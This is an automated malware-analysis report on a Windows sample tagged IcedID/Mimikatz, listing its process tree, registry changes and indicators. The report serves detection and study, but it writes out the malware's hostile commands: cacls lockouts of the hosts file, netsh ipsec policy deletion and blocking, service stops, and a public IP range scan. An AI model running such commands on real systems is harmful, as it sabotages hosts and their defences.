cmd.exenet.execmd.execmd.execmd.execmd.exeegujfrlin.exeschtasks.exenet.exenetsh.execmd.execacls.exenet.exenet1.execmd.exeschtasks.exesc.execacls.execmd.execacls.execacls.exenetsh.exenetsh.exenet.exexohudmc.execmd.execmd.exenet.exelbsulqbbe.execacls.exenetsh.exenet.exenet.execmd.execacls.exenetsh.execmd.execmd.exenet1.execmd.exenetsh.execmd.exesc.exe2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.execmd.exenetsh.exesc.execmd.execmd.exePING.EXEcmd.exenetsh.exenetsh.execmd.exenet1.exeschtasks.exenetsh.exenet1.execmd.execmd.exenetsh.execmd.exepujbqc.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language egujfrlin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lbsulqbbe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pujbqc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 916 cmd.exe 400 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023bcc-6.dat nsis_installer_2 behavioral2/files/0x0008000000023c1a-15.dat nsis_installer_1 behavioral2/files/0x0008000000023c1a-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
pngsbwu.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" pngsbwu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pngsbwu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" pngsbwu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pngsbwu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing pngsbwu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" pngsbwu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iaifetitb.exe -
Modifies registry class 14 IoCs
Processes:
pngsbwu.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" pngsbwu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ pngsbwu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" pngsbwu.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 1036 schtasks.exe 1800 schtasks.exe 3524 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pngsbwu.exepid Process 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 668 668 668 668 668 668 668 668 668 668 668 668 668 668 668 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exepid Process 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exepngsbwu.exepngsbwu.exevfshost.exeiaifetitb.exeibjntt.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exeiaifetitb.exedescription pid Process Token: SeDebugPrivilege 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3708 pngsbwu.exe Token: SeDebugPrivilege 960 pngsbwu.exe Token: SeDebugPrivilege 4352 vfshost.exe Token: SeDebugPrivilege 4304 iaifetitb.exe Token: SeLockMemoryPrivilege 4852 ibjntt.exe Token: SeLockMemoryPrivilege 4852 ibjntt.exe Token: SeDebugPrivilege 3096 iaifetitb.exe Token: SeDebugPrivilege 972 iaifetitb.exe Token: SeDebugPrivilege 4084 iaifetitb.exe Token: SeDebugPrivilege 4964 iaifetitb.exe Token: SeDebugPrivilege 880 iaifetitb.exe Token: SeDebugPrivilege 4924 iaifetitb.exe Token: SeDebugPrivilege 640 iaifetitb.exe Token: SeDebugPrivilege 2748 iaifetitb.exe Token: SeDebugPrivilege 4904 iaifetitb.exe Token: SeDebugPrivilege 4404 iaifetitb.exe Token: SeDebugPrivilege 2384 iaifetitb.exe Token: SeDebugPrivilege 4524 iaifetitb.exe Token: SeDebugPrivilege 4756 iaifetitb.exe Token: SeDebugPrivilege 1988 iaifetitb.exe Token: SeDebugPrivilege 1036 iaifetitb.exe Token: SeDebugPrivilege 4228 iaifetitb.exe Token: SeDebugPrivilege 3240 iaifetitb.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exepngsbwu.exepngsbwu.exexohudmc.exepujbqc.exepngsbwu.exepid Process 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe 3708 pngsbwu.exe 3708 pngsbwu.exe 960 pngsbwu.exe 960 pngsbwu.exe 2996 xohudmc.exe 4632 pujbqc.exe 3748 pngsbwu.exe 3748 pngsbwu.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.execmd.exepngsbwu.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 3488 wrote to memory of 916 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe 85 PID 3488 wrote to memory of 916 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe 85 PID 3488 wrote to memory of 916 3488 2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe 85 PID 916 wrote to memory of 400 916 cmd.exe 88 PID 916 wrote to memory of 400 916 cmd.exe 88 PID 916 wrote to memory of 400 916 cmd.exe 88 PID 916 wrote to memory of 3708 916 cmd.exe 94 PID 916 wrote to memory of 3708 916 cmd.exe 94 PID 916 wrote to memory of 3708 916 cmd.exe 94 PID 960 wrote to memory of 1664 960 pngsbwu.exe 96 PID 960 wrote to memory of 1664 960 pngsbwu.exe 96 PID 960 wrote to memory of 1664 960 pngsbwu.exe 96 PID 1664 wrote to memory of 3676 1664 cmd.exe 98 PID 1664 wrote to memory of 3676 1664 cmd.exe 98 PID 1664 wrote to memory of 3676 1664 cmd.exe 98 PID 1664 wrote to memory of 2748 1664 cmd.exe 99 PID 1664 wrote to memory of 2748 1664 cmd.exe 99 PID 1664 wrote to memory of 2748 1664 cmd.exe 99 PID 1664 wrote to memory of 2092 1664 cmd.exe 100 PID 1664 wrote to memory of 2092 1664 cmd.exe 100 PID 1664 wrote to memory of 2092 1664 cmd.exe 100 PID 1664 wrote to memory of 3628 1664 cmd.exe 101 PID 1664 wrote to memory of 3628 1664 cmd.exe 101 PID 1664 wrote to memory of 3628 1664 cmd.exe 101 PID 1664 wrote to memory of 4616 1664 cmd.exe 102 PID 1664 wrote to memory of 4616 1664 cmd.exe 102 PID 1664 wrote to memory of 4616 1664 cmd.exe 102 PID 1664 wrote to memory of 3652 1664 cmd.exe 103 PID 1664 wrote to memory of 3652 1664 cmd.exe 103 PID 1664 wrote to memory of 3652 1664 cmd.exe 103 PID 960 wrote to memory of 1340 960 pngsbwu.exe 107 PID 960 wrote to memory of 1340 960 pngsbwu.exe 107 PID 960 wrote to memory of 1340 960 pngsbwu.exe 107 PID 960 wrote to memory of 3468 960 pngsbwu.exe 109 PID 960 wrote to memory of 3468 960 pngsbwu.exe 109 PID 960 wrote to memory of 3468 960 pngsbwu.exe 109 PID 960 wrote to memory of 964 960 pngsbwu.exe 111 PID 960 wrote to memory of 964 960 pngsbwu.exe 111 PID 960 wrote to memory of 964 960 pngsbwu.exe 111 PID 960 wrote to memory of 4072 960 pngsbwu.exe 113 PID 960 wrote to memory of 4072 960 pngsbwu.exe 113 PID 960 wrote to memory of 4072 960 pngsbwu.exe 113 PID 4072 wrote to memory of 4000 4072 cmd.exe 115 PID 4072 wrote to memory of 4000 4072 cmd.exe 115 PID 4072 wrote to memory of 4000 4072 cmd.exe 115 PID 4000 wrote to memory of 3912 4000 wpcap.exe 116 PID 4000 wrote to memory of 3912 4000 wpcap.exe 116 PID 4000 wrote to memory of 3912 4000 wpcap.exe 116 PID 3912 wrote to memory of 1036 3912 net.exe 118 PID 3912 wrote to memory of 1036 3912 net.exe 118 PID 3912 wrote to memory of 1036 3912 net.exe 118 PID 4000 wrote to memory of 4352 4000 wpcap.exe 119 PID 4000 wrote to memory of 4352 4000 wpcap.exe 119 PID 4000 wrote to memory of 4352 4000 wpcap.exe 119 PID 4352 wrote to memory of 3968 4352 net.exe 121 PID 4352 wrote to memory of 3968 4352 net.exe 121 PID 4352 wrote to memory of 3968 4352 net.exe 121 PID 4000 wrote to memory of 1296 4000 wpcap.exe 122 PID 4000 wrote to memory of 1296 4000 wpcap.exe 122 PID 4000 wrote to memory of 1296 4000 wpcap.exe 122 PID 1296 wrote to memory of 3824 1296 net.exe 124 PID 1296 wrote to memory of 3824 1296 net.exe 124 PID 1296 wrote to memory of 3824 1296 net.exe 124 PID 4000 wrote to memory of 4644 4000 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2084
-
C:\Windows\TEMP\quevbjfbb\ibjntt.exe"C:\Windows\TEMP\quevbjfbb\ibjntt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-31_f2060510bd803ebbcab2c7f12c1caeee_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\taptlsnb\pngsbwu.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:400
-
-
C:\Windows\taptlsnb\pngsbwu.exeC:\Windows\taptlsnb\pngsbwu.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3708
-
-
-
C:\Windows\taptlsnb\pngsbwu.exeC:\Windows\taptlsnb\pngsbwu.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3676
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2092
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3652
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1340
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3468
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:964
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bfeilulnt\pvqslbkgq\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\bfeilulnt\pvqslbkgq\wpcap.exeC:\Windows\bfeilulnt\pvqslbkgq\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1036
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3968
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3824
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4880 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2060
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bfeilulnt\pvqslbkgq\egujfrlin.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bfeilulnt\pvqslbkgq\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\bfeilulnt\pvqslbkgq\egujfrlin.exeC:\Windows\bfeilulnt\pvqslbkgq\egujfrlin.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bfeilulnt\pvqslbkgq\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4452
-
-
-
